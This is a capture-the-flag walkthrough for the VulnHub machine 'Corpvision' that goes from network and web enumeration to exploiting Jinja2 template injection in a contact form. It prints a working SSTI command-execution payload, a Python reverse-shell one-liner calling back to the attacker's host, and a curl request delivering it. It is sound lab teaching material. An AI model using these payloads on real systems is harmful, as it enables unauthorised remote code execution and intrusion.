Corpvision:1 || VulnHub Walkthrough

Inside this Article:

• Settings Up
• Enumeration
• Identify the IP address
• Conduct the Network Scan using Nmap
• Web Enumeration and Directory Busting
• Enumerate the Web Vulnerability with Acunetix
• Exploitation
• Illustrating how an SSTI vulnerability works and verifying it?
• Foothold
• Gain Foothold using Python-based engine Jinja2
• Gain Reverseshell 

 Hello everyone! Welcome to my new video. Today, we're exploring a vulnerable machine called " Corpvision ". This machine is part of a single series and is categorized as " Beginner to Intermediate " in terms of difficulty.

To get started, head over to the VulnHub website and download the vulnerable image. If you're new to VulnHub, check out our VulnHub playlist for helpful videos.

Settings Up

Once you've downloaded the image, the next step is setting up the server in VirtualBox. This process is quite simple and involves importing the OVA file into VirtualBox using the " import appliance " feature.

Importing the OVA file into VirtualBox is a straightforward process. Unfortunately, When the virtual box attempts to import the virtual machine, an issue arises, leading to automatic aborts importing. Let's troubleshoot this.

To resolve the problem, we'll need to extract the OVA file and manually install the VM. Here, we'll rename the OVA extension to ZIP. 

Since direct renaming isn't possible, open Command Prompt from this directory by typing " cmd " in the Address bar. 

This will open Command Prompt in the same directory. Use the " dir " command to list all directories and files. Then, to rename, utilize the " REN " command.

With the OVA extension changed to ZIP, we can now extract it using WinRAR . 

After extraction, I discovered several helpful files, including two VMDK files . 

Our next step involves creating a new virtual machine. Launch VirtualBox. 

In VirtualBox, click on " New " to create a new VM. 

Name it " Corpvision 1 " Select the operating system type as Linux and set the version to Other Linux 64-bit, since we do not know.

Proceed by allocating RAM size for your VM and click " Next ." 

Select " Use an existing virtual hard disk file " and import the VMDK file extracted earlier.

After clicking " Next ," then " Finish ," the setup is complete. 

Once the import is finished, you'll see the " Corpvision " vulnerable machine listed in the VirtualBox Manager under the VulnHub group.

Now, go to Settings, then Storage, and add the second additional VMDK file. 

Now, change the Network adapter to " Host-Only ."

It's important to ensure that both your Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, so make sure they're both connected via the host-only adapter.

Next, attempt to start the VM to check if it works.

Finally, you'll notice that our Vulnerable Machine is ready, with a login prompt awaiting. Let's dive into the fun!

Enumeration

Identify the IP address

The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using Net Discover. To execute this, open a terminal and run " netdiscover -i " followed by specifying the network interface name, which in this case is " eth1 ."

┌──(kali㉿kali)-[~]

└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.99.0/16   |   Screen View: Unique Hosts                                                              

                                                                                                                                  

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                  

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 192.168.95.1    0a:00:27:00:00:0d      1      60  Unknown vendor                                                                 

 192.168.95.2    08:00:27:b6:31:e1      1      60  PCS Systemtechnik GmbH                                                         

 192.168.95.17   08:00:27:8e:e8:b1      1      60  PCS Systemtechnik GmbH                                                         

From the scan results, we've obtained our target IP address: " 192.168.95.17 ."

Conduct the Network Scan using Nmap

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. We'll use the popular Nmap tool for this task. Run " nmap -sC -sV followed by specifying the IP address ".

nmap -sC -sV {specifying the IP address}

In this command, 

• "- sC " is used to perform a script scan using the default set of scripts, 
• while "- sV " enables version detection, allowing us to identify which versions are running on which port.

┌──(kali㉿kali)-[~]

└─$ nmap -sC -sV 192.168.95.17

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 05:17 IST

Nmap scan report for 192.168.95.17

Host is up (0.00050s latency).

Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   2048 69:ce:61:c0:c6:3e:2f:78:4e:2d:d6:f1:80:a6:e6:b0 (RSA)

|   256 d6:d3:60:1d:d2:2d:92:9e:06:b5:ad:72:6e:ce:aa:5a (ECDSA)

|_  256 ad:d3:1b:f4:32:3b:bc:de:cc:e5:4e:ad:41:d6:b2:e5 (ED25519)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

|_http-title: Corp Vision - Corporate Category Bootstrap Responsive Template...

|_http-server-header: Apache/2.4.18 (Ubuntu)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds

                                                                                                                                   

┌──(kali㉿kali)-[~]

└─$ 

After completing the network scan, we found 2 open ports:

• The Port 22 TCP runs an SSH service, indicating that with valid credentials, gaining login access to the server will be straightforward, 
• and Port 80 TCP runs an HTTP service, suggesting a vulnerable website is hosted on the target server.

Web Enumeration and Directory Busting

Now, let's explore the content of the website running on Port 80. To look at the contents ourselves, open a web browser of your choice, and navigate to the target’s IP address in the URL bar at the top of the window.

Upon visiting the webpage, I discovered that it uses a Bootstrap responsive design, which I confirmed using the Wappalyzer tool. 

However, the visible content on the page doesn't provide any valuable information. To explore further, we can inspect the page's source code by right-clicking on the page. 

But, this too doesn't reveal anything useful.

To continue our investigation of the target URL, we will perform directory busting to uncover hidden or hard-to-access directories and pages. For this task, we'll use the " gobuster " tool with the following command.

gobuster dir -u {Target URL} -w {Path-to-wordlist}

Where, 

• gobuster dir is used to instruct gobuster to perform directory busting.  
• -u is used to specify the target URL we want to explore. 
• -w is used to provide the path to the wordlist containing common directory names to try.

┌──(kali㉿kali)-[~]

└─$ gobuster dir -u http://192.168.95.17/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://192.168.95.17/

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.6

[+] Timeout:                 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/contact              (Status: 200) [Size: 15208]

/services             (Status: 200) [Size: 20986]

/static               (Status: 301) [Size: 315] [--> http://192.168.95.17/static/]

/about                (Status: 200) [Size: 24454]

/javascript           (Status: 301) [Size: 319] [--> http://192.168.95.17/javascript/]

/server-status        (Status: 403) [Size: 278]

Progress: 220560 / 220561 (100.00%)

===============================================================

Finished

===============================================================

                                                                                                                                   

┌──(kali㉿kali)-[~]

└─$

Using a directory-busting tool, we have identified various directories. One directory, " static ," appears suspicious upon initial inspection. 

Upon exploring the "/static " web directory, we find that it contains files and directories with some level of access permissions. 

However, this exploration hasn't provided any immediate clues for gaining a foothold.

Enumerate the Web Vulnerability with Acunetix

To expedite our investigation, we'll use an automated web vulnerability scanner. Previously, I created several videos on this topic, which you might find helpful if you're interested. 

Exploring Web Vulnerability Scanners

Discover the latest in web vulnerability scanners. This guide provides an overview of various tools available for detecting and addressing security vulnerabilities in web applications, helping you protect your online assets effectively.

For this task, I will use Acunetix, a web vulnerability scanner known for its simplicity and effectiveness. 

Installing Acunetix on Kali Linux with Docker

Learn how to install Acunetix on Kali Linux using Docker. This guide provides detailed instructions to help you set up and use Acunetix for comprehensive web vulnerability scanning on your Kali Linux system.

To start the Acunetix services, open a terminal and type: service acunetix start.

┌──(kali㉿kali)-[~]

└─$ service acunetix sta                                                                                                                                    ┌──(kali㉿kali)-[~]

└─$ service acunetix status

● acunetix.service - Acunetix Service

     Loaded: loaded (/etc/systemd/system/acunetix.service; enabled; preset: disabled)

     Active: active (running) since Thu 2024-05-23 05:13:47 IST; 25min ago

   Main PID: 863 (start.sh)

      Tasks: 16 (limit: 4610)

     Memory: 184.8M (peak: 197.7M)

        CPU: 2min 33.676s

     CGroup: /system.slice/acunetix.service

             ├─  863 /bin/bash /home/acunetix/.acunetix/start.sh

             ├─  885 /home/acunetix/.acunetix/v_200217097/database/bin/postgres -D /home/acunetix/.acunetix/db --port=35432

             ├─  892 "postgres: checkpointer process   "

             ├─  893 "postgres: writer process   "

             ├─  894 "postgres: wal writer process   "

             ├─  895 "postgres: autovacuum launcher process   "

             ├─  896 "postgres: stats collector process   "

             ├─  902 /home/acunetix/.acunetix/v_200217097/backend/opsrv --conf /home/acunetix/.acunetix/wvs.ini

             ├─  903 /home/acunetix/.acunetix/v_200217097/backend/opsrv --conf /home/acunetix/.acunetix/wvs.ini

             ├─12116 "postgres: acunetix wvs ::1(49734) idle"

             ├─12117 "postgres: acunetix wvs ::1(49746) idle"

             ├─12118 "postgres: acunetix wvs ::1(49756) idle"

             ├─12127 "postgres: acunetix wvs ::1(49762) idle"

             ├─12128 "postgres: acunetix wvs ::1(49776) idle"

             └─12148 "postgres: acunetix wvs ::1(49784) idle"

May 23 05:39:10 kali start.sh[903]: 2024-05-23 05:39:10,401: DEBUG server.application handling get:https:/api/v1/me

May 23 05:39:27 kali start.sh[903]: 127.0.0.1 - - [2024-05-23 05:39:10] "GET /api/v1/me HTTP/1.1" 200 412 0.028352

May 23 05:39:27 kali start.sh[903]: 2024-05-23 05:39:27,394: DEBUG server.application handling get:https:/

May 23 05:39:29 kali start.sh[903]: 127.0.0.1 - - [2024-05-23 05:39:27] "GET / HTTP/1.1" 200 1412 0.001526

May 23 05:39:29 kali start.sh[903]: 2024-05-23 05:39:29,645: DEBUG helpers.application.health RAM: 87MB

May 23 05:39:35 kali start.sh[903]: 2024-05-23 05:39:35,729: DEBUG server.application handling get:https:/api/v1/me

May 23 05:39:36 kali start.sh[903]: 127.0.0.1 - - [2024-05-23 05:39:35] "GET /api/v1/me HTTP/1.1" 200 412 0.010221

May 23 05:39:36 kali start.sh[903]: 2024-05-23 05:39:36,078: DEBUG server.application handling get:https:/api/v1/me

                                                                                                                                   

┌──(kali㉿kali)-[~]

└─$

Next, open a browser and navigate to the Acunetix default webpage, which runs on port 3443. 

Add the target URL for scanning and save it. 

Target saved successfully, now, click on " Scan ".

Select the " Full scan " option to ensure a comprehensive check.

From the Acunetix scan results, I found two severe vulnerabilities: Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) . 

While the XSS vulnerability is not particularly useful in this context, the SSTI vulnerability might allow us to gain a reverse shell. 

Let's proceed with exploiting this vulnerability to gain further access.

Exploitation

To exploit the Server-Side Template Injection (SSTI) vulnerability, it's important to understand how this vulnerability works. 

SSTI happens when user input is embedded into a server-side template in an unsafe manner, which allows an attacker to execute arbitrary code on the server.

In this scenario, the vulnerability is found in the Name field of the contact form located at http://192.168.95.17/contact . 

This means that any data entered into the Name field can potentially be used to inject and run code on the server due to improper handling of the template input.

Illustrating how an SSTI vulnerability works and verifying it?

Here's a common scenario illustrating how an SSTI (Server-Side Template Injection) vulnerability might work:

First, let's visit the page where the vulnerability is found in the Name field of the contact form located.

Since the Name field can potentially be used to inject and run code, we can test for the vulnerability by injecting {{7*7}} into the Name field and add any additional information to the other fields. 

Now, let's confirm the vulnerability.

When the form is submitted, the website processes the input, and the server-side template engine executes the code.

If the server evaluates the expression {{7*7}} and returns 49 , this confirms that the vulnerability exists.

To confirm the vulnerability, we injected {{7*7}} into the Name field and observed that the server evaluated the expression to 49. Since the output is 49, we can confirm that the Name field is indeed vulnerable to SSTI. This vulnerability can potentially be exploited to read sensitive information from the server, such as the contents of files.

Foothold

Next, it's time to exploit the vulnerability to gain Foothold. To exploit this vulnerability, you need to determine the template engine being used. 

Common template engines include  Jinja2 (Python), Twig (PHP), and others. 

Given the response format, which looks like HTML with Python-like syntax for expressions, it’s likely a Python-based engine like Jinja2.

Gain Foothold using Python-based engine Jinja2

To proceed, we need to inject payloads to gain a reverse shell. For this purpose, I will use Burp Suite to analyze the behavior of the injection payload on the target.

First, launch Burp Suite from the Kali menu, and configure the browser's proxy settings using FoxyProxy .

Access the proxy tab, and activate intercept mode to capture target requests. 

Switch the proxy to Burp Suite within the FoxyProxy extension.

Now, reload the page to intercept the requested data, and send the captured request to Burp Suite's repeater tool.

Upon reloading the page, it will capture the requested data.

It’s time to send the captured request to the repeater tool in Burp Suite. 

Upon sending the request, we got the result of the request in the response section, which means it is working.

Next, let's inject a payload to execute code via SSTI . To confirm the vulnerability and test code execution, try injecting the following command:

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

This payload will execute the id command on the server. Replace the Name field data with the payload. 

Request data in Repeater

In the response, you can see the current user information, which is www-data , confirming that code execution is possible. 

Since this is working, let's proceed with gaining a reverse shell. 

Gain Reverseshell 

To achieve this, we need to inject a payload that sends a shell back to our attacking machine. For this purpose, I will use a Python reverse shell script. 

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((" [Host IP Address] ", [Listening Port] ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash");

We need to replace the IP address in the script with our Kali machine’s Host-only IP address and paste this payload into Burp Suite, as shown. 

Before sending the request, we need to set up a listener using Netcat. 

┌──(kali㉿kali)-[~]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

Now, click on " Send " to check if we get a reverse shell . 

Unfortunately, it did not work. I suspect this is because the request is automatically decoded from the URL form when sent. So, let's encode it and try again.

Still, it is not working. There is another way to send the request, using the curl command-line utility. Let me craft the curl command. 

curl -X POST http://192.168.95.17/contact \

  -H "Content-Type: application/x-www-form-urlencoded" \

  -H "Referer: http://192.168.95.17/" \

  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \

  -H "Accept-Encoding: gzip,deflate" \

  -H "Host: 192.168.95.17" \

  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" \

  -H "Connection: Keep-alive" \

  --data-urlencode "Name={{request.application.__globals__.__builtins__.__import__('os').popen('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.95.3\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\");\'').read()}}" \

  --data "w3lMessage=20&w3lPhone=555-666-0606&w3lSender=sample%40email.tst&w3lSubject=1"

After modifying and trying a few commands, finally it worked:

┌──(kali㉿kali)-[~]

└─$ curl -X POST http://192.168.95.17/contact \

  -H "Content-Type: application/x-www-form-urlencoded" \

  -H "Referer: http://192.168.95.17/" \

  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \

  -H "Accept-Encoding: gzip,deflate" \

  -H "Host: 192.168.95.17" \

  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" \

  -H "Connection: Keep-alive" \

  --data-urlencode "Name={{request.application.__globals__.__builtins__.__import__('os').popen('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.95.3\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\");\'').read()}}" \

  --data "w3lMessage=20&w3lPhone=555-666-0606&w3lSender=sample%40email.tst&w3lSubject=1"

If you are unable to craft the curl command, consider using AI tools like ChatGPT . 

On the Listening terminal, we can finally see the reverse shell. 

connect to [192.168.95.31] from (UNKNOWN) [192.168.95.17] 47180

/bin/sh: 0: can't access tty; job control turned off

$ which python

/usr/bin/python

$ python -c "import pty; pty.spawn('/bin/bash')"

data@ubuntu-xenial:/$

Since we have the reverse shell, let’s make it interactive. Let's check if Python is available on our target. 

$ which python

/usr/bin/python

$ 

Yes, it is. 

$ python -c "import pty; pty.spawn('/bin/bash')"

data@ubuntu-xenial:/$

Now, change the terminal type to `xterm`. 

data@ubuntu-xenial:/$ export TERM=xterm

export TERM=xterm

data@ubuntu-xenial:/$

Great, it's working well. Next, let's see if we can access the user flag. 

www-data@ubuntu-xenial:/$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@ubuntu-xenial:/$ whoami

www-data

www-data@ubuntu-xenial:/$ cd /home

www-data@ubuntu-xenial:/home$ ls -al

total 12

drwxr-xr-x 3 root   root   4096 May  2  2021 .

drwxr-xr-x 25 root   root   4096 May 23 13:55 ..

drwxr-xr-x 2 steven steven 4096 May  2  2021 steven

www-data@ubuntu-xenial:/home$ cd steven

bash: cd: steven: Permission denied

www-data@ubuntu-xenial:/home$

Unfortunately, we don't have sufficient privileges. Let's see if we can switch to the user "Steven".

However, after trying various methods, I couldn't find any clues or execute any shell commands effectively. 

I encourage you all to try your luck and find a way to obtain the root flag and the user flag.

Remember, brute force attacks are not possible because the target does not allow SSH connections from any other IP address. Additionally, local privilege escalation is not working because the GCC compiler does not have sufficient permissions. Keep these points in mind.

If you find a solution, please send a video or a copy of the output to my email or Instagram. See you then. If you have any doubts or queries, write to me in the comment section.